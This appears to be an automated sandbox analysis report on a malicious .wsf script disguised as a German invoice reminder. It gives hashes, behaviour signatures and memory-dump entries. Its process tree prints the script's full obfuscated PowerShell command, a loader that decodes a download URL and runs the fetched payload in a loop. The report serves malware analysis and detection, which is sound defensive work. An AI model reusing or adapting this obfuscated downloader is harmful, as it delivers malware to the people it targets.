Overview

overview

8

Static

static

1

Bestelleri...15.wsf

windows7-x64

8

Bestelleri...15.wsf

windows10-2004-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14/10/2024, 19:18

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Bestellerinnerung-Rechnungsnummer2024-507315.wsf

  • Size

    8KB

  • MD5

    5247deb6930b445cd63f008cda63e6f9

  • SHA1

    fa431cd45329897eea0d64475bc16a22f0bae896

  • SHA256

    b5179dcf8c55b9131d102cf216dfacbcf78d2e3f773d2493ce9aaa84db1d6b7a

  • SHA512

    cc71ec3bad16628cca7e63805415e9a5924203cd34fbb8ec23e88e68f4f994d209d1aa0b5ae45dbe6a92c0f5b6b7065d55ec696490cb3b4030545348ac7aecec

  • SSDEEP

    192:A8RsImHVMItdYFuInCqNGIXFfHokbUjC5JjLPdMUep1fkqvzO:+mfC1AbUQjDdML1rvK

Score
8/10
discovery

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bestellerinnerung-Rechnungsnummer2024-507315.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping aszzzw_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\system32\PING.EXE
        ping aszzzw_6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#cockscomb Potaske Indtagelse vitellose Bearbejders Inclips #>;$rectoplasty='Overemphasised';<#Striktrjens Marketenderiernes Feramorz Transuranic Gadis Sucklings Lukas #>;$Milen176=$Udbredelsen+$host.UI;If ($Milen176) {$Guldllerne++;}function Ungdomssektioner96($overcramming){$Neckercher=$Clearesmpetuosity+$overcramming.'Length'-$Guldllerne; for( $Cleares=4;$Cleares -lt $Neckercher;$Cleares+=5){$Askernes++;$favel+=$overcramming[$Cleares];$Rigsembedet='reallnsbegrebet';}$favel;}function Fagidioterne($chapeaux){ . ($Eksplosionsmotors) ($chapeaux);}$Bedragerenes=Ungdomssektioner96 ' ResMS yroArlez YeniD talGvinlkonsaMis /vigo ';$Bedragerenes+=Ungdomssektioner96 'Supe5Gen .Igno0Urer lan(ToniW ArciS,banEj nd SynoCubiwmasssTetr MooN upeTBluf Unbo1A.be0mong. luk0T.ye;Av,s rac.W O.piGe,dnFdre6Palm4Brod;Nong Fe rx ded6.ezz4Hypo; Pho FacurMaurv Gl.:Knsl1De.e3Decr1Majo.Blov0 Civ)Gra BortGKonveStomcInhakAktiodest/Spec2Ball0.uto1afte0Tank0F ui1 Ko 0Felt1 Li, TilsF Kr i Skrr Ny eAfkrfStu oI.vexS ae/udle1 Und3 Go 1per .Sted0Ov,r ';$Uranosphaerite=Ungdomssektioner96 'Ga lUGenus,obbe idaR Ema-,rmeaApopgKurfESol,NFlimt Tri ';$Modiste=Ungdomssektioner96 'Quadh St,tMoontJo dp on:Unve/Ban /Benzc Ad.aFo,erPilgeSende t ar Du fProai VotnRobodBalseInutr S l.OmstrModeo ha / uieIBedlnForec rcoDargnBolsc Fodu D drSusprV.rkeCollnPaattScut.GttecSchmuFestrTort ';$Lejren=Ungdomssektioner96 ' Org>Iw.r ';$Eksplosionsmotors=Ungdomssektioner96 'I doiPlaiEDatoxShad ';$Gravelous='Katinas';$Flidsprmiens='\Baccillum.Tri';Fagidioterne (Ungdomssektioner96 'Xant$FornGVar L Slao heebChinASlimLEmir:Bre fSkaaosupeR LinrPenta MoraR trdScioN echE SidlTo asNuc EOp us uld=A pe$ rniEActuNMindvInte: ForaTrolpSpo pP.imdRe oa EnkT TanaAmts+ ava$PludFIr,rl SkiI ImpD SalsLysep DelR Tetmfe liDeatEthroNOstrSNeb ');Fagidioterne (Ungdomssektioner96 're,i$Ox,bGIndiL kraOC.arBCapaA illPr.m:PyredKromaVulcVRatiI.grosr vsoconcn Car=Gyne$ urimForeOEa tDL veIP,ogS SeetOv,rE Oby.PracSChikPObjelSiwaiOr nT Un.(Foto$TriaLGemmEUndej Wi R vaneSkurnPen,)D gb ');Fagidioterne (Ungdomssektioner96 ' Reg[ G lN umbe IndtBach.Specs ileLiporAuktvOs aIHeadCSupeefig,P LilOElk IProlNMemot DamMButiABiognSyntATopcgIndye Oe,R ant]Tun : Gra:Va,rS BonEReg C Si U.eenRRrflIIsenTMindY BlypBortrsupeoSubcTManoOAktiCGlobo SkoLF.rd kine=Bred Foot[L ppNpy,eeDeviTVelg.LetfSUreaeLoc CFor,u Corr VegiD arTKaneYbetjPGalsR.criOMou tOlivO,yphCBetaoMorplUndeTEkspYRel P Inve S.r]Ref.: U.s:,kattCateL arrsCirc1Pljn2Ecto ');$Modiste=$Davison[0];$Vax=(Ungdomssektioner96 'Non $PappgFaucL Smao uphBOptiaR ntlBedi: edKDkniADundS CocTHoneeMac.pReocIIkenlSofiekarbNLigaEA.to= SmrNLecae muswUna - TolOCalcBNu zjChoreat eCNonat See Kob.S UpdySkarS ta T Afle NonMProd.ReednDragEPrf.ti tu.HimmWP.rseAdj bSmrecRantlFrplIForsESpgeNPla t New ');Fagidioterne ($Vax);Fagidioterne (Ungdomssektioner96 'unen$,ankKSneea co.s ebst U feGonzpSyn i LaclTe,teBe,anKle,eCons.Hub HMedie MaraRenod Stae DksrUn.isFoss[Disp$LandU overFremapaa,n VlgoRykks ldnpCathhBff,aErioeMargrOpkaiS.ylt A reTel ] unb=Anch$ ComBFatseMaa dUnplrEtiqa Se gdefeeJagtrekvie lovn rbae VicsSoma ');$Pericementoclasia=Ungdomssektioner96 'P.el$HeadKRed.aSemisP yltIsoae LevpT,ckiYdedlBrneeS ben Same .nt. p rD.dvooDel.w dannUnsilScaroDol a Mold uinFInduistarl PateEfte(Card$HermMOv roFastd nteiPrees R stKulmeBona,Dcla$Bis.CEpigoNeuruPatrnBjlktTrige aasrAfsvpFjerrIndho SkidTeksuLasscT.igtDyk iSyncvDoseeDe ulWillyKas,)Voya ';$Counterproductively=$Forraadnelses;Fagidioterne (Ungdomssektioner96 ' Sna$,pisGNesolUnsaOJas b orha ernlS ri:RastD iraI Defa CloE,oldRLinj=Pipa(Sbe,TOug e nts F rtFlje-Af.epBetjAAfkat Ba hL et Nonc$ e tCAastO,ayiuPlernKlo,TBordE Cy.RP erPRffer BruOHelmD Z gu ArsCConiT Kbmi D lVheadE.oncLConty udi)Pall ');while (!$Diaer) {Fagidioterne (Ungdomssektioner96 'Mi p$Non,g LeulFarvoAmpebArraayam.lKred: IndFXylorTot,aBrannSpectAeroiUndecHerraB hjlArtilab.uyFo p=Imp $CloctB utrHam uRagoeHale ') ;Fagidioterne $Pericementoclasia;Fagidioterne (Ungdomssektioner96 'RetiSMas.tJ dtaTil.rPrest Byi-BrleSR,flLZealEPrede Un PSubs Inco4 Rvb ');Fagidioterne (Ungdomssektioner96 ',mri$Enemg SlolK rsoLakebGy,nA UnslThel:ArkoDU iniSporaAff ETee.RHygr=Grap(NonttBindEPrecs FerTTekn-MeetP N,ta tyrtSammhVerd Lysr$ BricteacOAtioUGk eN N.dTGenne FouRMiliPDys r TllO ierd ChouTaktcDaist UnciNatiVC,rre Io lEkspypun )Unli ') ;Fagidioterne (Ungdomssektioner96 'P,at$DetagSouplBe.yoAfsyBguddaRepoLUndd:t rsT NonOD senLeakgSingADrmmNSalae B.kRFedtEomlanDupl=Tra $gno G Pr l Bi O otrBFiltaS usLT at:Polyf R.rO narFarvEDi cs SvitMicrWWoopaDyksr SamD IndsSub +Ste,+Th s%pens$ Kald askACru VIde i defsTektoOdelNOver.ChauC ravo EncUD kunPiltt Sha ') ;$Modiste=$Davison[$Tonganeren];}$jordbrrene=323447;$Empaneled=30892;Fagidioterne (Ungdomssektioner96 'Filn$ChalGA trlBe,tOGittb Tana erklSelv:Ud.kbTan ASa naAstrdsledE BarS BiokSappuThauRProg yge= Afd chagOldeEStattUdsp-Eri.c,epeoKe,inN ckt AndERetoNSystTTirr non $Sa rC verOTrttUTrifNMe.eT K nELuxuRSvinPO.gaR QueO hivd ponu .neCAfhuT Ae ISrgev aalE WitlProdYPyod ');Fagidioterne (Ungdomssektioner96 'Adua$Unrig pstl UnsoB ghb AvaaRockl coo:tossGDet r ,alaUntwt iseirudknDar.eRemerLaboeEndenBromdstaneBlab .oly=just Ninn[ U.aS AggyL ersSexst NoneMythm.hes.F,raCPr doColon moovGli,eGl srForut yst] Het:Iran:doorF ldlrElecoNonjmTaskBSchiaKlumsBismeOm l6Klip4M llS BkktForerAnusi Tern .pggHema(Sati$ PreB Tria Un.a PandTod eBj.rs AnhkParruFarvrLe,e) ast ');Fagidioterne (Ungdomssektioner96 'Cour$Sydag VitlSerao TribHydraD.felBerl:C inURemuN arbDunmiEDiscmSma,O matCB arr Equa hentSwerIShetSepr.EFugl Bl d=Gold Mora[LungSindhy Kers tewTD.twETri MBenz.RepoTOverESle xPanttGe a.Erh.eDvalN ndkc FdeOAreedMacri CisnBoksgDe.c]Unco:Lead:OverASeigsBlasCKultiF.riiDef .PolyGUdblEOviptBrn s ilbtSelvrTilfiKelin HypGredr(Skri$AnargUpbrrSpryaThe,tDataI Vannudf E DadRSel eShrinFilcD Sk EUdf,)Subs ');Fagidioterne (Ungdomssektioner96 'Serv$ eacG DeslTrumoT lsb TonAUnc.L,obb: ippDNov RHomoO GlosDec,cTippHLocoeP,psR Tel= upe$ButtUGradnEpimdSt aem ldmPil.O Midcforkr harAu.vnT ReriRetis QueEBes ..algs emiu in bGangSBr mTCou rGav Ibolvn PliGAn i(A et$SwagJMusto ndeRStrud Ma.b Ca rGor,rUnpee CounTohaEN nn, Pol$HimmE AabmW.igPUlstaFremNSperET rtLFirmEHomadAfh.) ini ');Fagidioterne $Droscher;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2928

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2928-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2928-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2928-6-0x0000000002280000-0x0000000002288000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2928-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2928-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2928-10-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2928-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2928-11-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2928-12-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2928-13-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2928-14-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

          Filesize

          9.6MB

          Download